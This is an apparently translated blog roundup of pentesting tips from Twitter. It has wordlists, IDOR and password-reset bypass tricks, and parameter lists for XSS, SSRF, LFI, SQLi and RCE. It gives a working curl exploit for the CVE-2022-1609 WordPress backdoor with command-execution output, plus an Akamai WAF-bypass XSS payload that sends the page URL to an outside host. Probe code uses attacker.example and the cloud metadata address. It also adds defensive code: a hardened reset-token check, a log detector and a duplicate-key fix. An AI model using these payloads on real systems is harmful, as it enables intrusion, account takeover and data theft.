
Practical tips | Twitter Pentesting Tips Roundup (Part 3)

HACK学习 (HACK学习呀) 2022-07-20

Wordlist tips

Paths worth keeping in a directory-discovery wordlist (exposed source control, shell dotfiles, and admin consoles of common middleware):

/.git/HEAD
/.git/logs/HEAD
/.import/
/.bashrc
/admin-cgi
/admin-console
/backup/
/console/
/console/login
/h2console
/cgi-bin/admin.cgi
/jmx-console/
/portal/
/portal/login
/syslog/
/web-console

Broken authorization hunting tips

Three shapes of the same idea: wrap the id in an object, repeat the key in a JSON body, or repeat the query parameter, so that the authorization check and the data lookup end up reading different values.

{"id":111} -> 401 Unauthorized
{"id":{"id":111}} -> 200 OK

POST /api/get_profile
Content-Type: application/json

{"user_id":<attacker_id>,"user_id":<victim's_id>}

GET /api_v1/messages?user_id=VICTIM_ID -> 401
GET /api_v1/messages?user_id=attack&user_id=VICTIM -> 200 OK

GitHub search syntax tips

Search a target user's repositories for their real name to find personal details committed into code:

User:XXX First Name Last Name
User:XXX Firstname Lastname
User:XXX Full Name
User:XXX Fullname

Password reset bug hunting tips

1- Completely remove the token
2- change it to 00000000...
3- use null/nil value
4- try expired token
5- try an array of old tokens
6- look for race conditions
7- change 1 char at the begin/end to see if the token is evaluated
8- use unicode char jutzu to spoof email address
9- try victim@email.com&attacker@email.com use %20 or | as separators
10- try to register the same mail with different TLD (.eu,.net etc)
11- don't add the domain locu@
12- try sqli bypass and wildcard or, %, *
13- request smuggler?
14- change request method (get, put, post etc) and/or content type (xml<>json)
15- match bad response and replace with good one
16- use super long string
17- Send a massive token
18- Send null fields
19- Send a -*-*-*--""---*-*;*;*-*--*-*;*;*-*-*+;**;;*+*+*!*!*+*++*;*;*+*+*+*++*;


Source:

https://twitter.com/Omar_J_Ahmed/status/1530649092577173507?s=20&t=WC6ryJ-bM7QVkDzU71iusg
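The defensive side of that checklist, as an added example that is not from the tweet or from any product: a reset-token store whose `consume` method rejects every input shape in items 1 to 7 and 16 to 18 and never takes the target account from the reset request (items 8 to 11). `TokenStore` is a constructed in-memory stand-in for wherever reset tokens are kept; the `now` argument exists so expiry and replay can be exercised without waiting.

```python
"""A reset-token check that survives the checklist above.

Added example, not from the tweet or any product. TokenStore is a
constructed in-memory stand-in for a real token table.
"""
import hashlib
import secrets
import time

TOKEN_BYTES = 32             # 256 bits of entropy, so guessing is pointless
TOKEN_TTL_SECONDS = 15 * 60
MAX_TOKEN_LENGTH = 128       # anything longer is garbage (items 16/17): reject before hashing


def _digest(token):
    # Store only a hash: a leaked table cannot be replayed, and the dict lookup
    # runs on a fixed-length digest rather than on the attacker-chosen string.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


class TokenStore:
    def __init__(self):
        self._by_digest = {}   # sha256(token) -> (email, expires_at)

    def issue(self, email, now=None):
        """Create a single-use token bound to the account it was requested for."""
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(TOKEN_BYTES)
        self._by_digest[_digest(token)] = (email, now + TOKEN_TTL_SECONDS)
        return token

    def consume(self, submitted, now=None):
        """Return the bound email for a valid token, else None.

        Every path that finds a stored token deletes it, so a token is
        usable at most once, whatever else is wrong with the request.
        """
        now = time.time() if now is None else now
        # Items 1, 3, 5, 16, 17, 18: no token, null, an array, an empty or an
        # oversize string never reaches the lookup, however the request was encoded.
        if (not isinstance(submitted, str) or not submitted
                or len(submitted) > MAX_TOKEN_LENGTH):
            return None
        # Items 2 and 7: all zeros, or one changed character, hashes to nothing
        # we stored. pop, not get: the token is gone after this call (items 5, 6).
        entry = self._by_digest.pop(_digest(submitted), None)
        if entry is None:
            return None
        email, expires_at = entry
        if now > expires_at:
            return None        # item 4: an expired token is deleted, not honoured
        # Items 8 to 11: the account comes from the stored binding, never from an
        # email field in the reset request, so victim&attacker tricks have no effect.
        return email


if __name__ == "__main__":
    store = TokenStore()
    token = store.issue("victim@example.com")
    print("valid first use ->", store.consume(token))
    print("replay           ->", store.consume(token))
```

The `pop` is atomic within one Python process, which is what closes the race in item 6 here; with a shared database the equivalent is a single `DELETE ... RETURNING` (or a conditional update) rather than a `SELECT` followed by a `DELETE`.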

CVE-2022-1609 WordPress Weblizar backdoor

The plugin's `/wp-json/am-member/license` REST route runs the PHP passed in the `blowf` parameter when `blowfish=1` is also sent, as the `id` output shows:

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Source:

https://twitter.com/momika233/status/1529694086193508353?s=20&t=WC6ryJ-bM7QVkDzU71iusg
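Spotting exploitation of that route after the fact, as an added example that is not from the tweet or from the plugin vendor: the function below flags every request to the `/am-member/license` REST route in a web server log, both in the `/wp-json/...` form shown above and in WordPress's `?rest_route=` form (used when pretty permalinks are off). The log lines are constructed samples in combined log format.

```python
"""Flag requests to the CVE-2022-1609 backdoor route in web server logs.

Added example, not from the tweet or from the plugin vendor.
The log lines are constructed samples.
"""
import re
from urllib.parse import parse_qs, urlsplit

BACKDOOR_ROUTE = "/am-member/license"

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: two backdoor hits and two ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Jul/2022:10:01:02 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Jul/2022:10:01:07 +0000] "POST /wp-json/am-member/license HTTP/1.1" 200 37 "-" "curl/7.79.1"
198.51.100.2 - - [20/Jul/2022:10:02:15 +0000] "GET /?rest_route=/am-member/license&blowfish=1 HTTP/1.1" 200 37 "-" "python-requests/2.28"
198.51.100.7 - - [20/Jul/2022:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def requested_rest_route(target):
    """Return the REST route a request targets, or None if it is not a REST call."""
    parts = urlsplit(target)
    if parts.path.startswith("/wp-json/"):
        return "/" + parts.path[len("/wp-json/"):].rstrip("/")
    route = parse_qs(parts.query).get("rest_route")
    if route:
        return route[0].rstrip("/")
    return None


def find_backdoor_hits(log_text):
    """Return (ip, timestamp, method, status) for every request to the backdoor route."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if requested_rest_route(m["target"]) == BACKDOOR_ROUTE:
            hits.append((m["ip"], m["ts"], m["method"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in find_backdoor_hits(SAMPLE_LOG):
        print("backdoor request:", *hit)
```

The `blowf` payload travels in the POST body, so an access log only shows that the route was reached, not what was executed; a hit with status 200 is the cue to pull the request body from a WAF or proxy log and to check the plugin files on disk.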

Akamai XSS WAF bypass

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click

Source:

https://twitter.com/0x0SojalSec/status/1529490656074141696?s=20&t=WC6ryJ-bM7QVkDzU71iusg


The parameter names below are the ones most often involved in each bug class, whether you hunt with tools or by hand. When one of them shows up in a target, fuzz it for the corresponding vulnerability.

Common XSS parameters

?q={payload}
?s={payload}
?search={payload}
?id={payload}
?lang={payload}
?keyword={payload}
?query={payload}
?page={payload}
?keywords={payload}
?year={payload}
?view={payload}
?email={payload}
?type={payload}
?name={payload}
?p={payload}
?month={payload}
?image={payload}
?list_type={payload}
?url={payload}
?terms={payload}
?categoryid={payload}
?key={payload}
?login={payload}
?begindate={payload}
?enddate={payload}

Common SSRF parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Source: https://twitter.com/NandanLohitaksh/status/1520254745402773510?s=20&t=WC6ryJ-bM7QVkDzU71iusg

Common LFI (local file inclusion) parameters

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

Common SQL injection parameters

?id=
?page=
?dir=
?search=
?category=
?file=
?class=
?url=
?news=
?item=
?menu=
?lang=
?name=
?ref=
?title=
?view=
?topic=
?thread=
?type=
?date=
?form=
?join=
?main=
?nav=
?region=

Common RCE (remote code execution) parameters

?cmd=
?exec=
?command=
?execute=
?ping=
?query=
?jump=
?code=
?reg=
?do=
?func=
?arg=
?option=
?load=
?process=
?step=
?read=
?function=
?req=
?feature=
?exe=
?module=
?payload=
?run=
?print=

Common open redirect parameters

?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

Source: https://github.com/lutfumertceylan/top25-parameter
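Turning those lists into probe requests, as an added example that is not code from the top25-parameter repository: each parameter of a class gets its own marker value so that a single request can show which parameters a page reflects and whether the reflection is HTML-encoded, while the SSRF and redirect lists get one URL per parameter carrying the same attacker-controlled target. The lists are shortened from the ones above, and the response body is a constructed sample; nothing is sent over the network.

```python
"""Turning the parameter lists above into probe requests.

Added example, not from the top25-parameter repository. Lists are
shortened; the response body is a constructed sample.
"""
import html
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

XSS_PARAMS = ["q", "s", "search", "id", "lang", "keyword", "query", "page"]
SSRF_PARAMS = ["dest", "redirect", "uri", "path", "continue", "url", "next", "callback"]
REDIRECT_PARAMS = ["next", "url", "target", "rurl", "dest", "redirect", "return", "continue"]


def probe_markers(params, prefix="pf"):
    """Map each parameter to a unique marker carrying the characters an XSS
    sink has to neutralise: a double quote and angle brackets."""
    return {p: f'{prefix}{i:02d}"<>' for i, p in enumerate(params)}


def build_probe_url(base, values):
    """Append the probe parameters to base, keeping any query it already has."""
    parts = urlsplit(base)
    query = parse_qsl(parts.query, keep_blank_values=True) + list(values.items())
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), parts.fragment))


def build_probe_urls(base, params, payload):
    """One URL per parameter, all carrying the same payload (SSRF/redirect style)."""
    return [build_probe_url(base, {p: payload}) for p in params]


def classify_reflections(body, markers):
    """Per parameter: 'raw' if its marker came back untouched, 'encoded' if it
    came back HTML-escaped; parameters that are not reflected are absent."""
    result = {}
    for param, marker in markers.items():
        if marker in body:
            result[param] = "raw"
        elif html.escape(marker, quote=True) in body:
            result[param] = "encoded"
    return result


# Constructed response to the XSS probe: q is escaped, search is echoed raw.
SAMPLE_BODY = (
    '<input name="q" value="pf00&quot;&lt;&gt;">'
    '<h2>Results for pf02"<></h2>'
)

if __name__ == "__main__":
    markers = probe_markers(XSS_PARAMS)
    print(build_probe_url("https://target.example/search?cat=1", markers))
    print(classify_reflections(SAMPLE_BODY, markers))
    for url in build_probe_urls("https://target.example/go", REDIRECT_PARAMS, "https://attacker.example/"):
        print(url)
    for url in build_probe_urls("https://target.example/fetch", SSRF_PARAMS, "http://169.254.169.254/"):
        print(url)
```

A 'raw' result only says the marker survived output encoding; the next step is to look at which context it landed in (attribute, text node, script) before choosing a payload. A parameter that is absent from the result may still be stored and reflected elsewhere.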

Email-based password reset tips

When requesting a password reset, try supplying more than one email address and check whether both of your mailboxes receive the message:

🔹 email=victim&email=attacker
🔹 email[]=victim&email[]=attacker
🔹 email=victim,attacker
🔹 {email: victim, email:attacker}
🔹 {email: [victim,attacker]}
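Why the repeated-key tricks in the broken-authorization section and in the email variants above work, as an added example that is not from the original post or any real API: two parsers, two answers. The "service" functions are constructed stand-ins in which an authorization check and a data lookup read the same parameter through different rules, beside a hardened version that parses once, refuses repeats, and authorizes the exact value it goes on to use.

```python
"""Parser differentials behind duplicate-key tricks.

Added example, not from the original post or any real API. The service
functions are constructed stand-ins.
"""
import json
from urllib.parse import parse_qs, parse_qsl


def first_occurrence(query, name):
    """Some frameworks (and many WAF rules) read the first value of a repeated parameter."""
    return parse_qs(query)[name][0]


def last_occurrence(query, name):
    """PHP's $_GET and Python's dict(parse_qsl(...)) keep the last value."""
    return dict(parse_qsl(query))[name]


def reset_recipients(query):
    """A mailer that sends to every value it was given: email=victim&email=attacker
    delivers the reset link to both mailboxes."""
    return parse_qs(query)["email"]


def json_keep_last(body, name):
    """json.loads keeps the last duplicate key."""
    return json.loads(body)[name]


def json_keep_first(body, name):
    """A parser that keeps the first duplicate key (emulated with object_pairs_hook)."""
    def keep_first(pairs):
        out = {}
        for k, v in pairs:
            out.setdefault(k, v)
        return out
    return json.loads(body, object_pairs_hook=keep_first)[name]


def messages_vulnerable(query, session_user):
    """Authorization reads the first user_id, the data layer reads the last one."""
    if first_occurrence(query, "user_id") != session_user:
        return 401, None
    return 200, f"messages of {last_occurrence(query, 'user_id')}"


def reject_duplicates(pairs):
    """Shared guard for query strings and JSON objects: any repeated key is an error."""
    seen = set()
    for k, _ in pairs:
        if k in seen:
            raise ValueError(f"duplicate key {k!r}")
        seen.add(k)
    return dict(pairs)


def messages_fixed(query, session_user):
    """Parse once, refuse repeats, authorize the very value you go on to use."""
    try:
        params = reject_duplicates(parse_qsl(query, keep_blank_values=True))
    except ValueError:
        return 400, None
    user_id = params.get("user_id")
    if user_id != session_user:
        return 401, None
    return 200, f"messages of {user_id}"


def load_json_strict(body):
    """json.loads that refuses repeated keys at every nesting level."""
    return json.loads(body, object_pairs_hook=reject_duplicates)


if __name__ == "__main__":
    polluted = "user_id=1001&user_id=2002"
    print("vulnerable:", messages_vulnerable(polluted, "1001"))
    print("fixed:     ", messages_fixed(polluted, "1001"))
    print("recipients:", reset_recipients("email=victim@example.com&email=attacker@example.com"))
```

The nested `{"id":{"id":111}}` case from the authorization section is a different defect (type confusion rather than duplicate keys): `load_json_strict` accepts it, so the handler must additionally check that `id` is the scalar type it expects before comparing it with the session.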

Recommended reading: https://github.com/vavkamil/awesome-bugbounty-tools




Recommended reading:

Practical tips | Twitter Pentesting Tips Roundup (Part 1)
Practical tips | Twitter Pentesting Tips Roundup (Part 2)
Practical tips | GitHub Security Roundup, 2022 Issue 12
Hands-on | WAF Bypass: A Summary of SQL Injection Evasion Approaches




Compiled and edited by HACK学习; please credit HACK学习 when reposting.
